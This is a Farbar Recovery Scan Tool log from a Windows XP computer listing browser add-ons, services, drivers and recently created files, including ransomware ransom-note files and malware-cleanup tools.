==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
URLSearchHook: HKCU - Ad-Aware Security Toolbar - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO: Ad-Aware Security Toolbar -> {6c97a91e-4524-4019-86af-2aa2d567bf5c} -> C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Ad-Aware Security Toolbar - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
Toolbar: HKCU - &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll (Microsoft Corporation)
Toolbar: HKCU - &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll (Microsoft Corporation)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://go.microsoft.com/fwlink/?linkid=39204
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
ShellExecuteHooks: Windows Desktop Search Namespace Manager - {56F9679E-7826-4C84-81F3-532071A8BCC5} - C:\Program Files\Windows Desktop Search\MSNLNamespaceMgr.dll [304128 2009-05-24] (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 0.0.0.0
Tcpip\..\Interfaces\{44C2C7EA-F701-4F67-880D-ECFE2FE5B7BA}: [NameServer]8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{6A0C5F9A-BF17-46DE-9AC9-35267BF55774}: [NameServer]8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{96E2D96F-12B6-4E49-9218-35E42F97A477}: [NameServer]8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> c:\program files\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @Skype Technologies S.A..com/Skype Web Plugin -> C:\Program Files\SkypeWebPlugin\npSkypeWebPlugin.dll (Skype)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2012-08-22]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-02]
 
Chrome: 
=======
CHR HomePage: hxxp://www.google.co.uk/
CHR StartupUrls: "https://www.google.co.uk/"
CHR Plugin: (Widevine Content Decryption Module) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\WidevineCDM\1.4.2.464\_platform_specific\win_x86\widevinecdmadapter.dll No File
CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\pdf.dll ()
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npdrmv2.dll (Microsoft Corporation)
CHR Plugin: (Windows Media Player Plug-in Dynamic Link Library) - C:\Program Files\Windows Media Player\npdsplay.dll (Microsoft Corporation (written by Digital Renaissance Inc.))
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npwmsdrm.dll (Microsoft Corporation)
CHR Plugin: (RealNetworks RealDownloader Chrome Background Extension Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
CHR Plugin: (RealNetworks RealDownloader HTML5VideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealNetworks RealDownloader PepperFlashVideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealDownloader Plugin) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
CHR Plugin: (Citrix Online Web Deployment Plugin 1.0.0.104) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
CHR Plugin: (Facebook Video Calling Plugin) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll No File
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.550.13) - C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java Platform SE 7 U55) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Presentation Foundation) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (RealPlayer G2 LiveConnect-Enabled Plug-In (32-bit) ) - c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer Download Plugin) - c:\program files\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (AdBlock) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-07-24]
CHR Extension: (Pin It Button) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2013-05-24]
CHR Extension: (Lavasoft SecureSearch) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jjjgoniibiigbcfeipbhfcconfgmgmkc [2014-08-05]
CHR Extension: (Save to Pocket) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\niloccemoadcdkdjlinkgdfekeahmflj [2013-10-23]
CHR Extension: (Google Wallet) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-28]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\DOCUME~1\KONSTA~1\LOCALS~1\APPLIC~1\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2012-11-29]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 BAsfIpM; C:\WINDOWS\system32\basfipm.exe [77824 2003-02-06] (Broadcom Corp.) [File not signed]
S2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182696 2014-03-17] (Oracle Corporation)
S2 LavasoftAdAwareService11; C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe [655352 2014-06-03] ()
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [11552 2012-03-26] (Microsoft Corporation)
S2 PEVSystemStart; C:\ComboFix\SWREG.3XE [518144 2000-08-31] (SteelWerX) [File not signed]
S2 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [1200128 2005-12-19] (Dell Inc.) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 BASFND; C:\WINDOWS\system32\Drivers\BASFND.sys [6057 2002-03-13] (Broadcom Corporation) [File not signed]
S3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [424448 2006-12-18] (Broadcom Corporation)
S3 GTICARD; C:\WINDOWS\System32\DRIVERS\gticard.sys [59328 2003-02-06] (Texas Instruments)
S3 HSFHWICH; C:\WINDOWS\System32\DRIVERS\HSFHWICH.sys [208384 2005-05-03] (Conexant Systems, Inc.)
S3 HSF_DPV; C:\WINDOWS\System32\DRIVERS\HSF_DPV.SYS [1033728 2005-05-03] (Conexant Systems, Inc.)
S0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [171064 2012-03-20] (Microsoft Corporation)
S3 STAC97; C:\WINDOWS\System32\drivers\STAC97.sys [264440 2004-11-15] (SigmaTel, Inc.)
R3 tiumfwl; C:\WINDOWS\System32\drivers\tiumfwl.sys [42060 2003-02-14] (Texas Instruments Inc.)
S3 Trufos; C:\WINDOWS\System32\DRIVERS\Trufos.sys [360376 2014-04-22] (BitDefender S.R.L.)
S3 vrvd5; C:\WINDOWS\System32\DRIVERS\vrvd5.sys [11296 2014-06-16] (Rsupport Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-07 16:23 - 2014-08-07 16:26 - 00000000 ___SD () C:\ComboFix
2014-08-07 12:13 - 2014-08-07 12:13 - 00000000 _RSHD () C:\cmdcons
2014-08-07 12:13 - 2004-08-03 23:00 - 00260272 __RSH () C:\cmldr
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\Qoobox
2014-08-07 12:08 - 2011-06-26 07:45 - 00256000 _____ () C:\WINDOWS\PEV.exe
2014-08-07 12:08 - 2010-11-07 18:20 - 00208896 _____ () C:\WINDOWS\MBR.exe
2014-08-07 12:08 - 2009-04-20 05:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00212480 _____ (SteelWerX) C:\WINDOWS\SWXCACLS.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00098816 _____ () C:\WINDOWS\sed.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00080412 _____ () C:\WINDOWS\grep.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00068096 _____ () C:\WINDOWS\zip.exe
2014-08-07 11:41 - 2014-08-07 11:42 - 05568206 ____R (Swearware) C:\Documents and Settings\Konstantine Trivizas\Desktop\ComboFix.exe
2014-08-06 16:31 - 2014-08-06 16:32 - 00044049 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Addition.txt
2014-08-06 16:26 - 2014-08-07 17:20 - 00015839 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST.txt
2014-08-06 14:37 - 2014-08-06 14:38 - 01084928 _____ (Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
2014-08-06 13:51 - 2014-08-07 17:19 - 00000000 ____D () C:\FRST
2014-08-05 16:15 - 2014-08-05 16:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Lavasoft
2014-08-05 15:43 - 2014-08-07 14:31 - 00002028 _____ () C:\Documents and Settings\All Users\Desktop\Ad-Aware Antivirus.lnk
2014-08-05 15:43 - 2014-08-05 15:43 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Ad-Aware Antivirus
2014-08-05 15:35 - 2014-08-07 14:31 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Ad-Aware Browsing Protection
2014-08-05 15:35 - 2014-08-05 17:15 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Search Protection
2014-08-05 15:35 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\adawarebp
2014-08-05 15:34 - 2014-08-05 15:34 - 00000000 ____D () C:\Program Files\Toolbar Cleaner
2014-08-05 15:33 - 2014-08-05 15:34 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\adawaretb
2014-08-05 15:28 - 2014-08-05 15:28 - 00000000 ____D () C:\Program Files\Common Files\Lavasoft
2014-08-05 15:14 - 2014-08-05 15:14 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\LavasoftStatistics
2014-08-05 14:02 - 2014-08-05 15:38 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-05 13:40 - 2014-08-05 13:41 - 00001355 _____ () C:\WINDOWS\imsins.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00001083 _____ () C:\WINDOWS\netfxocm.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000425 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000342 _____ () C:\WINDOWS\ocmsn.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000311 _____ () C:\WINDOWS\tabletoc.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000309 _____ () C:\WINDOWS\msgsocm.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00006642 _____ () C:\WINDOWS\iis6.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00002822 _____ () C:\WINDOWS\tsoc.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00002058 _____ () C:\WINDOWS\comsetup.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00001248 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00001878 _____ () C:\WINDOWS\msmqinst.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-08-05 13:38 - 2014-08-05 13:41 - 00006183 _____ () C:\WINDOWS\FaxSetup.log
2014-08-05 13:38 - 2014-08-05 13:41 - 00002956 _____ () C:\WINDOWS\ocgen.log
2014-08-05 13:34 - 2014-08-05 13:36 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB942288-v3$
2014-08-05 13:32 - 2014-08-05 13:41 - 00008464 _____ () C:\WINDOWS\KB942288-v3.log
2014-08-05 13:29 - 2014-08-05 13:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Lavasoft
2014-08-05 12:39 - 2014-08-05 15:39 - 00011803 _____ () C:\WINDOWS\setupapi.log
2014-08-04 17:11 - 2014-08-06 16:24 - 00110296 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-08-04 17:11 - 2014-08-04 17:11 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-04 17:11 - 2014-08-04 17:11 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-05 18:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-04 17:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2014-08-04 17:10 - 2014-05-12 07:26 - 00053208 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2014-08-04 17:10 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2014-08-04 17:04 - 2014-08-07 17:11 - 00032340 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-04 17:04 - 2014-08-07 14:48 - 00000215 _____ () C:\WINDOWS\wiadebug.log
2014-08-04 17:04 - 2014-08-07 14:21 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-08-04 17:04 - 2014-08-04 17:04 - 00000000 ____N () C:\WINDOWS\Sti_Trace.log
2014-08-04 16:59 - 2014-08-04 17:00 - 00000000 ____D () C:\WINDOWS\pss
2014-08-04 16:56 - 2014-08-07 17:11 - 00105714 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-04 16:55 - 2014-08-04 16:55 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2014-08-04 16:54 - 2014-08-04 17:02 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2014-08-04 16:54 - 2014-08-04 17:02 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Temp
2014-08-04 16:54 - 2014-08-04 17:02 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2014-08-04 16:54 - 2014-08-04 16:56 - 00000000 ____D () C:\Documents and Settings\Administrator
2014-08-04 16:54 - 2014-08-04 16:54 - 00000000 ____D () C:\WINDOWS\CSC
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-04 16:54 - 2013-03-21 11:16 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application DataGoogle
2014-08-04 16:54 - 2012-08-23 14:07 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft Help
2014-08-04 16:54 - 2012-08-20 19:03 - 00001599 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Remote Assistance.lnk
2014-08-04 16:54 - 2012-08-20 19:03 - 00000792 _____ () C:\Documents and Settings\Administrator\Start Menu\Programs\Windows Media Player.lnk
2014-08-04 16:54 - 2012-08-20 19:03 - 00000000 ___RD () C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories
2014-08-01 14:04 - 2014-08-01 14:04 - 00000000 ____D () C:\WINDOWS\system32\cos
2014-08-01 09:55 - 2014-08-01 09:55 - 00008198 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:55 - 2014-08-01 09:55 - 00004144 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:55 - 2014-08-01 09:55 - 00000274 _____ () C:\Documents and Settings\Konstantine Trivizas\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:51 - 2014-08-07 14:48 - 00262144 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
2014-08-01 09:51 - 2014-08-01 10:14 - 00065536 _____ () C:\WINDOWS\system32\config\EventForwarding-Operational.Evt
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Local Settings\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Default User\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\DECRYPT_INSTRUCTION.URL
2014-08-01 09:47 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\All Users\Application Data\DECRYPT_INSTRUCTION.URL
2014-08-01 09:43 - 2014-08-01 09:50 - 00065536 _____ () C:\WINDOWS\system32\config\Windows .evt
2014-08-01 09:42 - 2014-08-01 09:50 - 00065536 _____ () C:\WINDOWS\system32\config\Microsof.evt
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\winrm
2014-08-01 09:41 - 2014-08-01 09:41 - 00000000 ____D () C:\WINDOWS\system32\WindowsPowerShell
2014-08-01 09:40 - 2014-08-01 09:42 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-08-01 09:40 - 2014-08-01 09:40 - 00000000 ____D () C:\WINDOWS\$NtUninstallKB968930$
2014-08-01 09:37 - 2014-08-01 09:37 - 00000000 ___HD () C:\82c2f8c
2014-07-24 20:44 - 2014-08-07 11:49 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\TEMP
2014-07-24 20:44 - 2014-07-24 21:06 - 00000000 ____D () C:\Program Files\Your Uninstaller 2008
